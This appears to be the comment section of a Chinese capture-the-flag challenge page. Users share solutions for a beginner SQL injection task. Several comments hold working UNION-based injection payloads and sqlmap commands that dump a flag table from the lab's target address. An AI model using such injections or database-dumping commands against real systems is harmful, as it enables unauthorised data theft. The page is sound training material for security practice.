评分(24)
解题动态
ZZZZM 攻破了该题 5小时前
stanting 攻破了该题 6小时前
popidojdow 攻破了该题 9小时前
Tomato薯条 攻破了该题 11小时前
herego 攻破了该题 19小时前
woshiyanhua 攻破了该题 22小时前
yanqiu 攻破了该题 1天前
临安 攻破了该题 1天前
凡尘桔子 攻破了该题 1天前
yinlin 攻破了该题 1天前
doushabao 攻破了该题 1天前
阿宁 攻破了该题 2天前
xuyuyan999 攻破了该题 2天前
kxzzy 攻破了该题 2天前
viper11 攻破了该题 2天前
cisp7 攻破了该题 3天前
Loge32 攻破了该题 3天前
天天1 攻破了该题 3天前
bubu1212 攻破了该题 3天前
评论
AAA浙江皮革城汪总 3年前
举报
sqlmap -u "http://114.67.175.224:10435/index.php" --data "id=1" --dump
zoey123 3年前
举报
很好,适合新手
sudopacman 3年前
举报
萌新打得最心惊胆战的一道题,第一次碰sqlmap,不知道为什么-u "[path]"出来一直报错,最后手工暴力做出来了
4549 3年前
举报
赞,很适合新手
goodfxxkingbye 3年前
举报
id=-1' union select 1,2,3,group_concat(skctf_flag) from fl4g#
him9947 3年前
举报
你是我大哥
lzh20030509 3年前
举报
评论区yyds
15305265925 3年前
举报
id=-1' union select 1,2,group_concat(skctf_flag),4 from fl4g-- -
xiaoxhw 3年前
举报
利用”不显示“代表”报错“
笨笨笨蛋 3年前
举报
我sqlmap进入fl4g后查看内容压根没有flag,可是手工注入又有了,这是为什么?求一个大佬解释一下
aWxvdmVjdGY 3年前
举报
fl4g 是db,然后找table,在找cloumns,最后dump
教练我要打亚索 3年前
举报
先猜一下字段,我也是没猜字段直接取数据 没取到,需要先取一下字段 然后再来取数据
笨笨笨蛋 3年前
举报
有大佬用sqlmap做的吗?我想看看sqlmap怎么做这个题目
摆烂选手 3年前
举报
@charonzzw 阿巴阿巴,摆烂选手大眼瞪小眼,咋搞啊。有没有会的,哭了
theonlypopcat 3年前
举报
sqlmap --url="http://靶场地址/index.php" --data="id=1" -D skctf -T fl4g -C skctf_flag --dump
charonzzw 3年前
举报
用burp去抓包 然后copy to flie 形成txt文件,sqlmap去运行这个包 然后依次查库 表 列就出flag了